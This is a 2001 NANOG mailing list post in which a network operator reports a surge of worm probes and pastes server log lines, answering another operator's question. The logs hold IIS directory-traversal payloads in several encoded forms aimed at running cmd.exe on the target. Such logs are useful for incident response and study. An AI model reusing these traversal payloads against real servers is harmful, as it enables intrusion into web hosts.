nanog mailing list archives
RE: Worm probes
From: "Don Lundquist" <don.lundquist () peak-10 com>
Date: Tue, 18 Sep 2001 10:23:50 -0400
Same here.... a lot of activity..... seems to be a pattern closely resembling Code Red.... - - [18/Sep/2001:09:28:57 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-" - - [18/Sep/2001:09:28:57 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-" - - [18/Sep/2001:09:28:57 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-" - - [18/Sep/2001:09:28:58 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-" - - [18/Sep/2001:09:28:58 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275 "-" "-" - - [18/Sep/2001:09:28:59 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275 "-" "-" - - [18/Sep/2001:09:28:59 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-" - - [18/Sep/2001:09:28:59 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-" Don -----Original Message----- From: sigma () pair com [mailto:sigma () pair com] Sent: Tuesday, September 18, 2001 9:55 AM To: nanog () merit edu Subject: Worm probes Has anyone else been seeing a dramatic increase in /scripts/.. NT worm probes this morning? We're seeing about 8000/second, starting around 9:15 Eastern time, to and from a wide variety of addresses. Is CodeRed or one of its relatives scheduled to start sweeping again today? We've never seen this level of traffic related to the NT worms. Even though we don't run any NT at all, we still have to suffer :( Kevin
Current thread:
- Re: Worm probes, (continued)
- Re: Worm probes Joseph McDonald (Sep 18)
- Re: Worm probes Daniel Senie (Sep 18)
- Re: Worm probes Iljitsch van Beijnum (Sep 18)
- Re: Worm probes M. David Leonard (Sep 19)
- Re: Worm probes Brett Frankenberger (Sep 19)
- Re: Worm probes z (Sep 18)
- Re[2]: Worm probes David Ulevitch (Sep 18)
- Re: Re[2]: Worm probes Nick Thompson (Sep 18)
- Re: Re[2]: Worm probes Rafi Sadowsky (Sep 18)
- Re: Worm probes Jeff Gehlbach (Sep 18)
- Re: Worm probes Joseph McDonald (Sep 18)
- RE: Worm probes Don Lundquist (Sep 18)
- RE: Worm probes Smith, Rick (Sep 18)
- Re: Worm probes Ulf Zimmermann (Sep 18)
- Re: Worm probes Jared Mauch (Sep 18)
- Re: Worm probes sigma (Sep 18)
- Re: Worm probes Ulf Zimmermann (Sep 18)
- Re: FW: Worm probes Rob Evans (Sep 18)
- Re: FW: Worm probes Jim Olsen (Sep 18)
- Re: Worm probes Jim Mercer (Sep 18)